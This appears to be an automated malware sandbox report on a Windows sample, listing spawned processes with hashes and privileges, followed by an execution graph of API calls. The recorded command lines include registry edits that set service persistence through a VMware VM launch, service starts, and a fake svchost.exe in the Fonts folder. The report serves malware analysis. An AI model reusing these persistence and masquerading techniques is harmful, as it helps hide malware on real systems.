                        Commandline:reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /f
                        Imagebase:0x2e0000
                        File size:59'392 bytes
                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:16
                        Start time:13:43:03
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1
                        Imagebase:0x8c0000
                        File size:18'944 bytes
                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:13:43:06
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\sc.exe
                        Wow64 process (32bit):true
                        Commandline:sc start WMPNetworkSxc
                        Imagebase:0xf80000
                        File size:61'440 bytes
                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:13:43:06
                        Start date:11/06/2024
                        Path:C:\Windows\Fonts\systkm32\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Fonts\systkm32\svchost.exe
                        Imagebase:0x1000000
                        File size:8'192 bytes
                        MD5 hash:4635935FC972C582632BF45C26BFCB0E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:19
                        Start time:13:43:06
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\PING.EXE
                        Wow64 process (32bit):true
                        Commandline:ping 127.0.0.1
                        Imagebase:0x8c0000
                        File size:18'944 bytes
                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:20
                        Start time:13:43:10
                        Start date:11/06/2024
                        Path:C:\Windows\SysWOW64\regini.exe
                        Wow64 process (32bit):true
                        Commandline:regini 1.ini
                        Imagebase:0x6d0000
                        File size:41'472 bytes
                        MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:23
                        Start time:13:43:41
                        Start date:11/06/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Reset < >

                          Execution Graph

                          Execution Coverage:10.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:5.5%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:42
                          execution_graph 35053 1fdc3e 35121 1fe88f 35053->35121 35056 1fe364 35058 1fe24c 35182 1e241c 35058->35182 35059 1fe030 35061 1fe0a7 35059->35061 35062 1fe035 35059->35062 35061->35058 35069 1fe0c5 35061->35069 35150 1ef0f0 42 API calls 3 library calls 35062->35150 35063 1fdfb6 35063->35058 35063->35059 35065 1fe0d2 35063->35065 35071 1fdd01 error_info_injector 35063->35071 35065->35058 35070 1fe23f 35065->35070 35154 1ef0f0 42 API calls 3 library calls 35065->35154 35067 1fe03f 35067->35058 35068 1fe047 35067->35068 35151 1f7c90 35 API calls 5 library calls 35068->35151 35153 1f7c90 35 API calls 5 library calls 35069->35153 35178 1e1f8e 35070->35178 35187 21af96 35071->35187 35076 1fe04e 35076->35058 35152 1e47dc 28 API calls 35076->35152 35077 1fe062 35077->35058 35078 1fe104 35078->35070 35155 1ef0f0 42 API calls 3 library calls 35078->35155 35079 1fe31e 35083 1e203f Concurrency::wait 28 API calls 35079->35083 35080 1fe2f4 35080->35079 35085 1e241c 22 API calls 35080->35085 35086 1fe33f 35083->35086 35084 1fe113 35084->35070 35087 1fe11b 35084->35087 35085->35079 35088 1e203f Concurrency::wait 28 API calls 35086->35088 35156 1f7c90 35 API calls 5 library calls 35087->35156 35088->35071 35090 1fe122 35157 1ef0f0 42 API calls 3 library calls 35090->35157 35092 1fdc7c error_info_injector 35092->35063 35092->35071 35127 1f73f0 35092->35127 35093 1fe26d error_info_injector 35186 1fe8ea 28 API calls 35093->35186 35094 1fe12b 35095 1fe23b 35094->35095 35097 1fe153 35094->35097 35095->35070 35158 1e3449 35097->35158 35102 1fe18a 35168 1e203f 35102->35168 35105 1e3449 31 API calls 35106 1fe1a3 35105->35106 35107 1faa54 31 API calls 35106->35107 35108 1fe1aa 35107->35108 35172 1e25a8 35108->35172 35110 1fe1c6 35111 1e203f Concurrency::wait 28 API calls 35110->35111 35112 1fe1cf 35111->35112 35176 1f4370 32 API calls 35112->35176 35114 1fe1d8 35115 1e25a8 28 API calls 35114->35115 35116 1fe1ef 35115->35116 35117 1e203f Concurrency::wait 28 API calls 35116->35117 35118 1fe1f8 35117->35118 35177 1fe939 LeaveCriticalSection EnterCriticalSection 35118->35177 35120 1fe20a 35120->35079 35122 1fe89e 35121->35122 35124 1fe8a5 35121->35124 35194 1fe83e 28 API calls 35122->35194 35126 1fe8a3 35124->35126 35195 21b1a7 35124->35195 35126->35092 35128 1f742b SetFileAttributesW 35127->35128 35137 1f7424 error_info_injector 35127->35137 35131 1f7450 35128->35131 35128->35137 35130 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35132 1f7507 35130->35132 35217 1f97a0 35131->35217 35132->35063 35134 1f747f 35135 1f7483 SetFileAttributesW 35134->35135 35138 1f749a 35134->35138 35136 1f7496 35135->35136 35135->35138 35136->35138 35137->35130 35138->35137 35139 1f750b 35138->35139 35241 21f174 35139->35241 35150->35067 35151->35076 35152->35077 35153->35077 35154->35078 35155->35084 35156->35090 35157->35094 35159 1e3469 35158->35159 35160 1e3452 35158->35160 35164 1faa54 35159->35164 35249 1faa00 22 API calls 35160->35249 35162 1e345f 35250 21b473 29 API calls __onexit 35162->35250 35251 1fa943 35164->35251 35167 1fa720 28 API calls 3 library calls 35167->35102 35169 1e204a 35168->35169 35170 1e2058 35168->35170 35274 1e2261 28 API calls 3 library calls 35169->35274 35170->35105 35173 1e25ee 35172->35173 35175 1e25bd BuildCatchObjectHelperInternal 35172->35175 35275 1e26d6 35173->35275 35175->35110 35176->35114 35177->35120 35179 1e1f9b 35178->35179 35180 1e1fb0 35178->35180 35181 1e206a 28 API calls 35179->35181 35180->35058 35181->35180 35183 1e243b 35182->35183 35184 1e23a8 22 API calls 35183->35184 35185 1e2442 35183->35185 35184->35185 35185->35093 35186->35080 35188 21afa1 IsProcessorFeaturePresent 35187->35188 35189 21af9f 35187->35189 35191 21afe8 35188->35191 35189->35056 35296 21afac SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35191->35296 35193 21b0cb 35193->35056 35194->35126 35198 21b1ac 35195->35198 35197 21b1c6 35197->35126 35198->35197 35200 21b1c8 35198->35200 35205 2207dc 35198->35205 35212 22145f 7 API calls 2 library calls 35198->35212 35201 21b9ba 35200->35201 35213 21d84d RaiseException 35200->35213 35214 21d84d RaiseException 35201->35214 35203 21b9d7 35211 2231bf __dosmaperr 35205->35211 35206 2231fd 35216 220a47 20 API calls __dosmaperr 35206->35216 35208 2231e8 RtlAllocateHeap 35209 2231fb 35208->35209 35208->35211 35209->35198 35211->35206 35211->35208 35215 22145f 7 API calls 2 library calls 35211->35215 35212->35198 35213->35201 35214->35203 35215->35211 35216->35209 35221 1f9b05 35217->35221 35222 1f97c1 35217->35222 35218 1f9c3c 35246 1e2330 28 API calls std::_Xinvalid_argument 35218->35246 35221->35218 35223 1f9b94 35221->35223 35224 1f9bc4 35221->35224 35240 1f9ac2 error_info_injector BuildCatchObjectHelperInternal 35221->35240 35222->35221 35228 1f981c _wcslen 35222->35228 35225 21b1a7 22 API calls 35223->35225 35226 21b1a7 22 API calls 35224->35226 35239 1f9a1d 35224->35239 35225->35239 35226->35239 35227 21f174 Concurrency::wait 26 API calls 35227->35218 35228->35218 35229 1f98b1 35228->35229 35230 1f98e2 35228->35230 35236 1f983b error_info_injector BuildCatchObjectHelperInternal 35228->35236 35231 21b1a7 22 API calls 35229->35231 35232 21b1a7 22 API calls 35230->35232 35230->35236 35231->35236 35232->35236 35233 1f997b BuildCatchObjectHelperInternal 35233->35134 35234 1f99fd 35237 21b1a7 22 API calls 35234->35237 35235 1f9a37 35238 21b1a7 22 API calls 35235->35238 35235->35239 35236->35218 35236->35233 35236->35234 35236->35235 35236->35239 35237->35239 35238->35239 35239->35227 35239->35240 35240->35134 35247 21f0e9 26 API calls 4 library calls 35241->35247 35243 21f183 35248 21f191 11 API calls _abort 35243->35248 35245 21f190 35247->35243 35248->35245 35249->35162 35250->35159 35252 1fa963 35251->35252 35253 1fa975 35251->35253 35254 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35252->35254 35256 1fa989 ___scrt_fastfail 35253->35256 35257 1fa980 GetModuleHandleW 35253->35257 35255 1fa9fc 35254->35255 35255->35167 35258 1fa99c LoadStringW 35256->35258 35257->35256 35259 1fa9d9 35258->35259 35260 1fa9b7 FindResourceW 35258->35260 35265 1e1fbc 35259->35265 35260->35252 35261 1fa9ce 35260->35261 35264 1ec5a0 28 API calls 35261->35264 35264->35252 35266 1e1fda _wcslen 35265->35266 35269 1e206a 35266->35269 35268 1e1fe6 35268->35252 35270 1e20a3 35269->35270 35272 1e2078 BuildCatchObjectHelperInternal 35269->35272 35273 1e21af 28 API calls Concurrency::wait 35270->35273 35272->35268 35273->35272 35274->35170 35276 1e2758 35275->35276 35277 1e26f4 35275->35277 35288 1e2330 28 API calls std::_Xinvalid_argument 35276->35288 35284 1e23a8 35277->35284 35281 1e2710 35283 1e2741 35281->35283 35287 1e2261 28 API calls 3 library calls 35281->35287 35283->35175 35289 1e2223 35284->35289 35286 1e23c1 35286->35281 35287->35283 35290 1e222b 35289->35290 35294 1e223c 35289->35294 35291 21b1a7 22 API calls 35290->35291 35291->35294 35292 21b1a7 22 API calls 35293 1e225c 35292->35293 35293->35286 35294->35292 35295 1e2243 35294->35295 35295->35286 35296->35193 35297 212a40 35298 212a6c 35297->35298 35299 212ab3 35298->35299 35300 212acd SetFileTime 35298->35300 35302 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35299->35302 35301 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35300->35301 35303 212aeb 35301->35303 35304 212ac7 35302->35304 35305 212940 35306 212959 35305->35306 35307 21294b FindCloseChangeNotification 35305->35307 35307->35306 35308 21b575 35309 21b581 ___scrt_is_nonwritable_in_current_image 35308->35309 35338 21b281 35309->35338 35311 21b588 35312 21b6db 35311->35312 35316 21b5b2 35311->35316 35373 21bb7b IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 35312->35373 35314 21b6e2 35366 22191d 35314->35366 35327 21b5f1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 35316->35327 35349 2224a5 35316->35349 35322 21b5d1 35324 21b652 35357 21bc95 35324->35357 35326 21b658 35361 1eb8bb 35326->35361 35327->35324 35369 2218e5 38 API calls 2 library calls 35327->35369 35332 21b674 35332->35314 35333 21b678 35332->35333 35334 21b681 35333->35334 35371 2218c0 28 API calls _abort 35333->35371 35372 21b410 13 API calls 2 library calls 35334->35372 35337 21b689 35337->35322 35339 21b28a 35338->35339 35375 21b9d8 IsProcessorFeaturePresent 35339->35375 35341 21b296 35376 21d8ba 10 API calls 3 library calls 35341->35376 35343 21b29b 35348 21b29f 35343->35348 35377 22233f 35343->35377 35345 21b2b6 35345->35311 35348->35311 35351 2224bc 35349->35351 35350 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35352 21b5cb 35350->35352 35351->35350 35352->35322 35353 222449 35352->35353 35355 222478 35353->35355 35354 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35356 2224a1 35354->35356 35355->35354 35356->35327 35444 21cc90 35357->35444 35360 21bcbb 35360->35326 35446 1eb8d8 CoInitializeEx InitCommonControlsEx 35361->35446 35363 1eb8c3 35364 1eb8cf 35363->35364 35447 1eb901 GetDesktopWindow 35363->35447 35370 21bccb GetModuleHandleW 35364->35370 36137 22169a 35366->36137 35369->35324 35370->35332 35371->35334 35372->35337 35373->35314 35375->35341 35376->35343 35381 225c7b 35377->35381 35380 21d8e3 8 API calls 3 library calls 35380->35348 35382 225c94 35381->35382 35383 225c98 35381->35383 35384 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35382->35384 35383->35382 35387 224217 35383->35387 35385 21b2a8 35384->35385 35385->35345 35385->35380 35388 224223 ___scrt_is_nonwritable_in_current_image 35387->35388 35399 224d54 EnterCriticalSection 35388->35399 35390 22422a 35400 225dfa 35390->35400 35392 224239 35393 224248 35392->35393 35413 2240ab 29 API calls 35392->35413 35415 224264 LeaveCriticalSection _abort 35393->35415 35396 224243 35414 224161 GetStdHandle GetFileType 35396->35414 35397 224259 _abort 35397->35383 35399->35390 35401 225e06 ___scrt_is_nonwritable_in_current_image 35400->35401 35402 225e13 35401->35402 35403 225e2a 35401->35403 35424 220a47 20 API calls __dosmaperr 35402->35424 35416 224d54 EnterCriticalSection 35403->35416 35406 225e18 35425 21f164 26 API calls _abort 35406->35425 35408 225e22 _abort 35408->35392 35411 225e62 35426 225e89 LeaveCriticalSection _abort 35411->35426 35412 225e36 35412->35411 35417 225d4b 35412->35417 35413->35396 35414->35393 35415->35397 35416->35412 35427 2248fd 35417->35427 35419 225d6a 35435 223185 35419->35435 35420 225d5d 35420->35419 35434 224561 11 API calls 2 library calls 35420->35434 35423 225dbc 35423->35412 35424->35406 35425->35408 35426->35408 35432 22490a __dosmaperr 35427->35432 35428 22494a 35442 220a47 20 API calls __dosmaperr 35428->35442 35429 224935 RtlAllocateHeap 35430 224948 35429->35430 35429->35432 35430->35420 35432->35428 35432->35429 35441 22145f 7 API calls 2 library calls 35432->35441 35434->35420 35436 223190 RtlFreeHeap 35435->35436 35437 2231b9 _free 35435->35437 35436->35437 35438 2231a5 35436->35438 35437->35423 35443 220a47 20 API calls __dosmaperr 35438->35443 35440 2231ab GetLastError 35440->35437 35441->35432 35442->35430 35443->35440 35445 21bca8 GetStartupInfoW 35444->35445 35445->35360 35446->35363 35484 1e8fe7 35447->35484 35449 1eb93d 35450 1eb949 GetCommandLineW CommandLineToArgvW 35449->35450 35451 1ebc87 35450->35451 35483 1eb99e _wcslen 35450->35483 35490 1eb542 35451->35490 35453 1ebc80 LocalFree 35453->35451 35455 1e1fbc 28 API calls 35455->35483 35456 1ebcdc 35497 1eb57f 35456->35497 35458 1ebce9 35461 1e203f Concurrency::wait 28 API calls 35458->35461 35459 1e3449 31 API calls 35460 1ebcbb 35459->35460 35463 1faa54 31 API calls 35460->35463 35465 1ebcf4 35461->35465 35462 1ebd35 35464 1e203f Concurrency::wait 28 API calls 35462->35464 35466 1ebcc2 35463->35466 35464->35458 35468 1e203f Concurrency::wait 28 API calls 35465->35468 35575 1e23e5 35466->35575 35470 1ebcfd 35468->35470 35469 1ebcd3 35472 1e203f Concurrency::wait 28 API calls 35469->35472 35473 1e203f Concurrency::wait 28 API calls 35470->35473 35471 1e206a 28 API calls 35471->35483 35472->35456 35474 1ebd06 35473->35474 35538 1e9160 35474->35538 35475 1e203f Concurrency::wait 28 API calls 35475->35483 35478 1ebc7c 35478->35453 35483->35453 35483->35455 35483->35462 35483->35471 35483->35475 35483->35478 35485 1e8ffc 35484->35485 35579 1e73c5 35485->35579 35488 21b1a7 22 API calls 35489 1e911b 35488->35489 35489->35449 35491 1e1f8e 28 API calls 35490->35491 35492 1eb555 35491->35492 35493 1e1f8e 28 API calls 35492->35493 35494 1eb561 35493->35494 35495 1e1f8e 28 API calls 35494->35495 35496 1eb579 35495->35496 35496->35456 35496->35459 35583 1eb7cd 35497->35583 35500 1eb64c 35502 1eb667 35500->35502 35503 1eb65b 35500->35503 35501 1eb5ab 35505 1e3449 31 API calls 35501->35505 35510 1eb5b3 35501->35510 35602 1e5602 35502->35602 35611 1e551e 29 API calls 35503->35611 35509 1eb5c9 35505->35509 35507 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35511 1eb709 35507->35511 35508 1eb675 35513 1eb68a CreateDialogParamW 35508->35513 35512 1faa54 31 API calls 35509->35512 35510->35507 35511->35458 35514 1eb5d0 35512->35514 35515 1eb69e IsWindow 35513->35515 35516 1eb6ad 35513->35516 35517 1e3449 31 API calls 35514->35517 35515->35516 35518 1eb6a5 35515->35518 35519 1eb6f0 KiUserCallbackDispatcher 35516->35519 35524 1eb6bd IsWindow 35516->35524 35520 1eb5de 35517->35520 35606 1e5472 GetSystemMetrics GetSystemMetrics GetWindowRect 35518->35606 35519->35510 35519->35516 35521 1faa54 31 API calls 35520->35521 35523 1eb5e5 35521->35523 35525 1eb616 MessageBoxW 35523->35525 35528 1e3449 31 API calls 35523->35528 35526 1eb6c6 IsDialogMessageW 35524->35526 35527 1eb6d7 TranslateMessage DispatchMessageW 35524->35527 35529 1e203f Concurrency::wait 28 API calls 35525->35529 35526->35516 35526->35527 35527->35516 35530 1eb5fb 35528->35530 35531 1eb63f 35529->35531 35532 1faa54 31 API calls 35530->35532 35533 1e203f Concurrency::wait 28 API calls 35531->35533 35534 1eb602 35532->35534 35533->35510 35535 1e23e5 28 API calls 35534->35535 35536 1eb60e 35535->35536 35537 1e203f Concurrency::wait 28 API calls 35536->35537 35537->35525 35539 1e203f Concurrency::wait 28 API calls 35538->35539 35540 1e916e 35539->35540 35541 1e203f Concurrency::wait 28 API calls 35540->35541 35542 1e9179 35541->35542 35543 1e203f Concurrency::wait 28 API calls 35542->35543 35544 1e9184 35543->35544 35545 1e203f Concurrency::wait 28 API calls 35544->35545 35546 1e918f 35545->35546 35547 1e203f Concurrency::wait 28 API calls 35546->35547 35548 1e919a 35547->35548 35549 1e203f Concurrency::wait 28 API calls 35548->35549 35550 1e91a5 35549->35550 35551 1e203f Concurrency::wait 28 API calls 35550->35551 35552 1e91b0 35551->35552 35553 1e203f Concurrency::wait 28 API calls 35552->35553 35554 1e91bb 35553->35554 35555 1e203f Concurrency::wait 28 API calls 35554->35555 35556 1e91c6 35555->35556 35557 1e203f Concurrency::wait 28 API calls 35556->35557 35558 1e91d1 35557->35558 35559 1e203f Concurrency::wait 28 API calls 35558->35559 35560 1e91dc 35559->35560 35561 1e203f Concurrency::wait 28 API calls 35560->35561 35562 1e91e7 35561->35562 35563 1e203f Concurrency::wait 28 API calls 35562->35563 35564 1e91f2 35563->35564 36136 1e4880 28 API calls Concurrency::wait 35564->36136 35566 1e91fd 35567 1e203f Concurrency::wait 28 API calls 35566->35567 35568 1e9205 35567->35568 35569 1e203f Concurrency::wait 28 API calls 35568->35569 35570 1e920d 35569->35570 35571 1e203f Concurrency::wait 28 API calls 35570->35571 35572 1e9215 35571->35572 35573 1e203f Concurrency::wait 28 API calls 35572->35573 35574 1e921d 35573->35574 35576 1e23f3 35575->35576 35578 1e23f8 35575->35578 35577 1e203f Concurrency::wait 28 API calls 35576->35577 35577->35578 35578->35469 35580 1e73cf 35579->35580 35581 1e2223 22 API calls 35580->35581 35582 1e7405 CreateSolidBrush 35581->35582 35582->35488 35612 1f1f00 GetModuleHandleW 35583->35612 35586 1eb81c 35644 1e74a2 35586->35644 35587 1e1f8e 28 API calls 35587->35586 35589 1eb85b 35590 1e203f Concurrency::wait 28 API calls 35589->35590 35592 1eb86f 35590->35592 35591 1eb84f 35717 1e3aad 44 API calls 2 library calls 35591->35717 35595 1e203f Concurrency::wait 28 API calls 35592->35595 35597 1eb877 35595->35597 35596 1e1f8e 28 API calls 35596->35591 35598 1e203f Concurrency::wait 28 API calls 35597->35598 35599 1eb87f 35598->35599 35600 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35599->35600 35601 1eb5a1 35600->35601 35601->35500 35601->35501 35603 1e5619 35602->35603 35604 1e5624 35602->35604 35603->35508 36135 1e5b67 28 API calls 2 library calls 35604->36135 35607 1e54ee 35606->35607 35608 1e54ab SetWindowPos 35606->35608 35609 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35607->35609 35608->35607 35610 1e54fb 35609->35610 35610->35516 35611->35510 35613 21cc90 ___scrt_fastfail 35612->35613 35614 1f1f63 GetModuleFileNameW 35613->35614 35615 1f212f 35614->35615 35620 1f1f84 _wcslen 35614->35620 35616 1f2181 GetModuleFileNameW 35615->35616 35626 1f219d _wcslen 35616->35626 35643 1f21d0 error_info_injector collate BuildCatchObjectHelperInternal 35616->35643 35617 1f2395 35719 21b0cd 5 API calls ___report_securityfailure 35617->35719 35619 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35622 1eb80b 35619->35622 35620->35617 35625 1f2390 35620->35625 35630 1f200a 35620->35630 35641 1f1fd4 error_info_injector BuildCatchObjectHelperInternal 35620->35641 35621 1f239a 35720 1e2330 28 API calls std::_Xinvalid_argument 35621->35720 35622->35586 35622->35587 35624 1f239f 35628 21f174 Concurrency::wait 26 API calls 35624->35628 35718 1e2330 28 API calls std::_Xinvalid_argument 35625->35718 35626->35621 35634 1f220f 35626->35634 35626->35643 35629 1f23a4 35628->35629 35631 1f2049 35630->35631 35632 1f207d 35630->35632 35635 21b1a7 22 API calls 35631->35635 35636 21b1a7 22 API calls 35632->35636 35640 1f2067 35632->35640 35633 1f224e 35638 21b1a7 22 API calls 35633->35638 35634->35633 35637 1f2282 35634->35637 35635->35640 35636->35640 35639 21b1a7 22 API calls 35637->35639 35642 1f226c 35637->35642 35638->35642 35639->35642 35640->35624 35640->35641 35641->35619 35642->35624 35642->35643 35643->35641 35721 22bf3c 35644->35721 35646 1e74b1 SetFileApisToOEM 35647 1e74e9 35646->35647 35648 1e74f2 35647->35648 35722 1e7481 35647->35722 35731 1e8476 35648->35731 35651 1e7502 35652 1e241c 22 API calls 35651->35652 35653 1e7522 35651->35653 35652->35653 35735 1e8a94 35653->35735 35656 1e756c 35658 1e7579 35656->35658 35659 1e203f Concurrency::wait 28 API calls 35656->35659 35657 1e203f Concurrency::wait 28 API calls 35657->35656 35660 21b1a7 22 API calls 35658->35660 35659->35658 35661 1e7586 35660->35661 35740 1f4b30 35661->35740 35664 1e75b8 error_info_injector 35795 1e8973 28 API calls Concurrency::wait 35664->35795 35665 1e75e3 35743 1e825c 35665->35743 35667 1e75ce 35796 1e849b InterlockedExchangeAdd 35667->35796 35671 1e825c 28 API calls 35701 1e7643 error_info_injector 35671->35701 35674 1e7af9 error_info_injector 35675 1e7b9a 35674->35675 35678 1e7b72 35674->35678 35679 1e1f8e 28 API calls 35674->35679 35676 1e1f8e 28 API calls 35675->35676 35689 1e7730 error_info_injector 35676->35689 35808 1e8a63 28 API calls 35678->35808 35679->35678 35681 1e7b83 35809 1f5150 35681->35809 35682 1e7bb3 error_info_injector 35815 1e8973 28 API calls Concurrency::wait 35682->35815 35684 1e7bdf 35816 1e849b InterlockedExchangeAdd 35684->35816 35687 1e75d9 35792 22be89 35687->35792 35688 21b1a7 22 API calls 35688->35701 35814 1e82b2 28 API calls Concurrency::wait 35689->35814 35690 1e241c 22 API calls 35690->35701 35692 1e30ed 28 API calls 35692->35701 35693 1e23e5 28 API calls 35693->35701 35694 1e7cc1 35695 1e203f Concurrency::wait 28 API calls 35694->35695 35697 1e7cc9 35695->35697 35698 1e203f Concurrency::wait 28 API calls 35697->35698 35698->35674 35699 1e203f 28 API calls Concurrency::wait 35699->35701 35701->35674 35701->35688 35701->35689 35701->35690 35701->35692 35701->35693 35701->35694 35701->35699 35705 1e79c7 35701->35705 35747 1fa0b0 35701->35747 35756 1e8281 35701->35756 35760 1fb2e6 35701->35760 35773 208f27 35701->35773 35817 1e82b2 28 API calls Concurrency::wait 35701->35817 35702 1e7a9d error_info_injector 35802 1e1fed 35702->35802 35704 1e7a8a 35798 1e81e7 35704->35798 35705->35702 35705->35704 35712 1e203f Concurrency::wait 28 API calls 35705->35712 35797 1e47dc 28 API calls 35705->35797 35706 1e7ac8 error_info_injector 35708 1e203f Concurrency::wait 28 API calls 35706->35708 35710 1e7af1 35708->35710 35714 1e203f Concurrency::wait 28 API calls 35710->35714 35712->35705 35713 1e203f Concurrency::wait 28 API calls 35713->35702 35714->35674 35717->35589 35719->35621 35721->35646 35818 1fa160 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 35722->35818 35724 1e7489 35725 21b1a7 22 API calls 35724->35725 35726 1e7490 35725->35726 35819 1fae9e 35726->35819 35732 1e848c 35731->35732 35733 1e8487 35731->35733 35732->35651 35902 1f4440 InterlockedExchangeAdd 35733->35902 35736 1e1f8e 28 API calls 35735->35736 35737 1e8aa3 35736->35737 35738 1e203f Concurrency::wait 28 API calls 35737->35738 35739 1e755c 35738->35739 35739->35656 35739->35657 35903 1f9d50 35740->35903 35744 1e7627 35743->35744 35745 1e8274 35743->35745 35744->35671 35926 1e84d6 28 API calls BuildCatchObjectHelperInternal 35745->35926 35748 1fa11f 35747->35748 35749 1fa0ca SetFilePointer 35747->35749 35750 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35748->35750 35751 1fa0f4 GetLastError 35749->35751 35752 1fa0fe 35749->35752 35753 1fa12d 35750->35753 35751->35748 35751->35752 35754 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35752->35754 35753->35701 35755 1fa119 35754->35755 35755->35701 35757 1e828f _wcslen 35756->35757 35927 1e8570 35757->35927 35761 1e1f8e 28 API calls 35760->35761 35762 1fb30a 35761->35762 35931 1e24e0 35762->35931 35767 1e203f Concurrency::wait 28 API calls 35768 1fb32b 35767->35768 35769 1fb32f 35768->35769 35770 1e81e7 28 API calls 35768->35770 35771 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35769->35771 35770->35769 35772 1fb35b 35771->35772 35772->35701 35774 208f33 __EH_prolog3_catch_GS 35773->35774 35958 20e860 35774->35958 35776 208f8d 35968 20c998 28 API calls Concurrency::wait 35776->35968 35778 208f87 35778->35776 35964 20e8b6 35778->35964 35780 208fec 35781 208ff2 35780->35781 35785 208ffc 35780->35785 35783 1e203f Concurrency::wait 28 API calls 35781->35783 35783->35776 35969 20bfe6 28 API calls 35785->35969 35793 21af96 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 35792->35793 35794 1e7bf1 35793->35794 35794->35589 35794->35591 35794->35596 35795->35667 35796->35687 35797->35705 35799 1e7a95 35798->35799 35800 1e81f5 35798->35800 35799->35713 35800->35799 35801 1e203f Concurrency::wait 28 API calls 35800->35801 35801->35800 35803 1e2030 35802->35803 35807 1e1ffe 35802->35807 35803->35706 35804 1e2016 36134 1e2261 28 API calls 3 library calls 35804->36134 35806 1e203f Concurrency::wait 28 API calls 35806->35807 35807->35804 35807->35806 35808->35681 35810 1f5188 35809->35810 35811 1f51aa error_info_injector 35809->35811 35810->35811 35812 21f174 Concurrency::wait 26 API calls 35810->35812 35811->35675 35813 1f51df 35812->35813 35814->35682 35815->35684 35816->35687 35817->35701 35818->35724 35832 1ff862 35819->35832 35821 1faea6 35836 1faf0b 35821->35836 35823 1faebb 35846 1fafaf 35823->35846 35826 1e84a6 35827 1e84b6 35826->35827 35828 1e74a0 35826->35828 35829 1e84c1 35827->35829 35900 1f4440 InterlockedExchangeAdd 35827->35900 35828->35648 35829->35828 35901 1f4450 InterlockedExchangeAdd 35829->35901 35833 1ff878 35832->35833 35834 1e2223 22 API calls 35833->35834 35835 1ff886 35834->35835 35835->35821 35837 1faf1f 35836->35837 35838 21b1a7 22 API calls 35837->35838 35839 1faf2a 35837->35839 35838->35839 35854 22db44 35839->35854 35841 1faf56 35842 21b1a7 22 API calls 35841->35842 35844 1faf5f 35842->35844 35843 1faf98 error_info_injector 35843->35823 35844->35843 35859 1fffd8 28 API calls error_info_injector 35844->35859 35847 1fafca 35846->35847 35848 21b1a7 22 API calls 35847->35848 35849 1fafd5 35847->35849 35848->35849 35850 22db44 RaiseException 35849->35850 35852 1fafff error_info_injector 35850->35852 35851 1e7498 35851->35826 35852->35851 35861 1ffa1f 35852->35861 35856 22db50 ___scrt_is_nonwritable_in_current_image std::__non_rtti_object::__construct_from_string_literal FindVITargetTypeInstance FindMITargetTypeInstance FindSITargetTypeInstance 35854->35856 35855 22db57 PMDtoOffset 35855->35841 35856->35855 35860 21d84d RaiseException 35856->35860 35858 22dc36 35858->35841 35859->35843 35860->35858 35862 1ffa33 35861->35862 35863 1ffac5 error_info_injector 35862->35863 35873 2008b8 35862->35873 35863->35852 35865 1ffa4c 35866 1ffaae 35865->35866 35867 1e2223 22 API calls 35865->35867 35898 200885 28 API calls 35866->35898 35869 1ffa7a 35867->35869 35897 